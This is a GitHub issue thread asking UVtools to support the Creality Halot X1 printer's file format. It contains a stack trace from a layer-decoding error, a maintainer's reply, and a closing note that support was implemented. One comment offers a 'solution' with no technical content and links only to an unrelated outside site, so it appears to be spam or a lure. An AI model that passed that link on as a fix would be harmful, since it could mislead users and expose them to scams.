sn4k3/UVtools #1016: [FEATURE REQUEST] Add PioCreat (Creality) Halot X1

ccatlett1984, 2025-04-13:
### Is your feature request related to a problem?

Currently opening the file results in some OutOfRangeExceptions.

### Describe the solution you'd like

I'd like to see this printer added.

I am attaching a sliced file.

### Files

[V3_Cones_v28_DISCORD_BETA.zip](https://github.com/user-attachments/files/19726733/V3_Cones_v28_DISCORD_BETA.zip)

ccatlett1984, 2025-04-13:
> File should be compatible, but have extra bytes on it.
> Which slicer have produced that? Have you tried on a different slicer?

That came from Halot Box, I do have an alpha of chitubox that has the
printer.

ccatlett1984, 2025-04-13:
[V3_Cones_v28_DISCORD_BETA.stl_0.050_1.5s_2025_04_13_18_47_00.cxdlpv4.zip](https://github.com/user-attachments/files/19727699/V3_Cones_v28_DISCORD_BETA.stl_0.050_1.5s_2025_04_13_18_47_00.cxdlpv4.zip)

here is the same model, sliced with the chitubox beta, with the same/correct printer selected.

ccatlett1984, 2025-04-13:
```
(1) System.ArgumentOutOfRangeException: The maximum size allowed for this Mat with an offset of 94188020 is 9580. (Parameter 'length')
Actual value was 16319.
   at UVtools.Core.Extensions.EmguExtensions.GetDataSpan[T](Mat mat, Int32 length, Int32 offset) in UVtools.Core\Extensions\EmguExtensions.cs:line 284
   at UVtools.Core.FileFormats.CrealityCXDLPv4File.LayerDefEx.Decode(CrealityCXDLPv4File parent, LayerDef layerDef, UInt32 layerIndex) in UVtools.Core\FileFormats\CrealityCXDLPv4File.cs:line 539
   at UVtools.Core.FileFormats.CrealityCXDLPv4File.<>c__DisplayClass169_0.<DecodeInternally>b__1(Int32 layerIndex) in UVtools.Core\FileFormats\CrealityCXDLPv4File.cs:line 1313
   at System.Threading.Tasks.Parallel.<>c__DisplayClass31_0`2.<ForEachWorker>b__0(Int32 i)
   at System.Threading.Tasks.Parallel.<>c__DisplayClass19_0`2.<ForWorker>b__1(RangeWorker& currentWorker, Int64 timeout, Boolean& replicationDelegateYieldedBeforeCompletion)
--- End of stack trace from previous location ---
   at System.Threading.Tasks.Parallel.<>c__DisplayClass19_0`2.<ForWorker>b__1(RangeWorker& currentWorker, Int64 timeout, Boolean& replicationDelegateYieldedBeforeCompletion)
   at System.Threading.Tasks.TaskReplicator.Replica.Execute()
---------------
(2) System.ArgumentOutOfRangeException: The maximum size allowed for this Mat with an offset of 94194413 is 3187. (Parameter 'length')
Actual value was 16144.
   at UVtools.Core.Extensions.EmguExtensions.GetDataSpan[T](Mat mat, Int32 length, Int32 offset) in UVtools.Core\Extensions\EmguExtensions.cs:line 284
   at UVtools.Core.FileFormats.CrealityCXDLPv4File.LayerDefEx.Decode(CrealityCXDLPv4File parent, LayerDef layerDef, UInt32 layerIndex) in UVtools.Core\FileFormats\CrealityCXDLPv4File.cs:line 539
   at UVtools.Core.FileFormats.CrealityCXDLPv4File.<>c__DisplayClass169_0.<DecodeInternally>b__1(Int32 layerIndex) in UVtools.Core\FileFormats\CrealityCXDLPv4File.cs:line 1313
   at System.Threading.Tasks.Parallel.<>c__DisplayClass31_0`2.<ForEachWorker>b__0(Int32 i)
   at System.Threading.Tasks.Parallel.<>c__DisplayClass19_0`2.<ForWorker>b__1(RangeWorker& currentWorker, Int64 timeout, Boolean& replicationDelegateYieldedBeforeCompletion)
--- End of stack trace from previous location ---
   at System.Threading.Tasks.Parallel.<>c__DisplayClass19_0`2.<ForWorker>b__1(RangeWorker& currentWorker, Int64 timeout, Boolean& replicationDelegateYieldedBeforeCompletion)
   at System.Threading.Tasks.TaskReplicator.Replica.Execute()
```

sn4k3, 2025-04-18:
The problem comes from Decoding RLE. Bits look correct but something changed.
Can you try to replicate the printer in prusaslicer, use UVtools to produce the file and send to printer to check if it will print?

campillumi, 2025-04-20:
I believe I found a solution to your problem. Check it out here [click](https://forreststonesolutions.com/robots/)

ok1ok1, 2026-03-27:
Was this ever resolved? I'm interested in this printer but only if it's compatible with uvtools.

sn4k3, 2026-10-08:
Implemented in next patch

closed 2026-10-08 by sn4k3